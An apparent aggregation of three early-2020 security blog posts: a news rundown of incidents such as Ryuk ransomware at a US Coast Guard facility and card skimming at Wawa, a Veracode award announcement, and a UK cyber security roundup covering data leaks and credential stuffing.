Cyber News Rundown: US Coast Guard Hit with Ransomware

Reading Time: ~ 2 min.

US Coast Guard Facility Hit with Ransomware

During the last week of December a US Coast Guard facility was the target of a Ryuk ransomware attack that shut down operations for over 30 hours. Though the Coast Guard has implemented multiple cybersecurity regulations in just the last six months or so, this attack broke through the weakest link in the security chain: human users. Ryuk typically spreads through an email phishing campaign that relies on the target clicking on a malicious link before spreading through a network.

Crypto-trading Platform Forces Password Reset After Possible Leak

Officials for Poloniex, a cryptocurrency trading platform, began pushing out forced password resets after a list of email addresses and passwords claiming to be from Poloniex accounts was discovered on Twitter. While the company was able to verify that many of the addresses found on the list weren’t linked to their site at all, they still opted to issue passwords reset for all clients. It’s still unclear where the initial list actually originated, but it was likely generated from a previous data leak and was being used on a new set of websites.

Cybersecurity Predictions for 2020: What Our Experts Have to Say

850 Wawa Stores Affected by Card-skimming

Nearly every one of Wawa’s 850 stores in the U.S. were found to be infected with a payment card-skimming malware for roughly eight months before the company discovered it. It appears Wawa only found out about the problem after Visa issued a warning about card fraud at gas pumps using less-secure magnetic strips. WaWa has since begun offering credit monitoring to anyone affected. In a statement, they mention skimming occurring from in-store transactions as well, so card chips would only be effective if the malware had been at the device level, rather than the transaction point.

Microsoft Takes Domains from North Korean Hackers

Microsoft recently retook control of 50 domains that were being used by North Korean hackers to launch cyberattacks. Following a successful lawsuit, Microsoft was able to use its extensive tracking data to shut down phishing sites that mainly targeted the U.S., Japan, and South Korea. The tech company is well-known for this tactic, having taken down 84 domains belonging to the Russian hacking group Fancy Bear and seizing almost 100 domains linked to Iranian spies.

Landry’s Suffers Payment Card Breach

One of the largest restaurant chain and property owners, Landry’s, recently disclosed that many of their locations were potentially affected by a payment card leak through their point-of-sale systems. The company discovered that from January through October of 2019, any number of their 600 locations had been exposed to a card-skimming malware if not processed through a main payment terminal that supported end-to-end encryption.

The post Cyber News Rundown: US Coast Guard Hit with Ransomware appeared first on Webroot Blog.

SC Media Inducts Veracode into its 2019 Innovator Hall of Fame

We are excited to announce that Veracode has been inducted into SC Media???s 2019 Innovator Hall of Fame. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is comprised of vendors with the most promising products and capabilities.

We???re honored to be one of only five new Hall of Fame inductees!

To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors??? greatest strengths.

???We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations,??? the SC Media editors wrote. ???Almost every organization pointed to two interrelated struggles: exhausting technological ???noise??? and personnel fatigue.??? This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.

???The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy,??? the editors said.

Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:

The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques ??? including static, dynamic and software composition analysis ??? the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software???s final form.

Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model ???makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners.???

The recognition went on to say:

Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.

Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. This strength is making a positive cultural impact on the perception of cybersecurity measures.

To learn more about our induction into the Innovator Hall of Fame, check out SC Media???s eBook, Innovators. For additional information on our comprehensive suite of products and services, visit the Veracode homepage

Cyber Security Roundup for January 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, December 2019.

Happy New Year!  The final month of the decade was a pretty quiet one as major security news and data breaches go, given cybers attack have become the norm in the past decade. The biggest UK media security story was saved for the very end of 2019, with the freshly elected UK government apologising after it had accidentally published online the addresses of the 1,097 New Year Honour recipients.  Among the addresses posted were those of Sir Elton John, cricketer and BBC 'Sports Personality of the Year' Ben Stokes, former Conservative Party leader Iain Duncan Smith, 'Great British Bakeoff Winner' Nadiya Hussain, and former Ofcom boss Sharon White. The Cabinet Office said it was "looking into how this happened", probably come down to a 'user error' in my view.

An investigation by The Times found Hedge funds had been eavesdropping on the Bank of England’s press conferences before their official broadcast after its internal systems were compromised. Hedge funds were said to have gained a significant advantage over rivals by purchasing access to an audio feed of Bank of England news conferences. The Bank said it was "wholly unacceptable" and it was investigating further. The Times claimed those paying for the audio feed, via the third party, would receive details of the Bank's news conferences up to eight seconds before those using the television feed - potentially making them money. It is alleged the supplier charged each client a subscription fee and up to £5,000 per use. The system, which had been misused by the supplier since earlier this year, was installed in case the Bloomberg-managed television feed failed.

A video showing a hacker talking to a young girl in her bedroom via her family's Ring camera was shared on social media. The hacker tells the young girl: "It's Santa. It's your best friend." The Motherboard website reported hackers were offering software making it easier to break into such devices. Ring owner Amazon said the incident was not related to a security breach, but compromised was due to password stuffing, stating "Due to the fact that customers often use the same username and password for their various accounts and subscriptions, bad actors often re-use credentials stolen or leaked from one service on other services."


Ransomware continues to plague multiple industries and it has throughout 2019, even security companies aren't immune, with Spanish security company Prosegur reported to have been taken down by the Ryuk ransomware.

Finally, a Microsoft Security Intelligence Report concluded what all security professionals know well, is that implementing Multi-Factor Authenication (MFA) would have thwarted the vast majority of identity attacks. The Microsoft study found reusing passwords across multiple account-based services is still common, of nearly 30 million users and their passwords, password reuse and modifications were common for 52% of users. The same study also found that 30% of the modified passwords and all the reused passwords can be cracked within just 10 guesses. This behaviour puts users at risk of being victims of a breach replay attack. Once a threat actor gets hold of spilled credentials or credentials in the wild, they can try to execute a breach replay attack. In this attack, the actor tries out the same credentials on different service accounts to see if there is a match.

BLOG
NEWS 
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE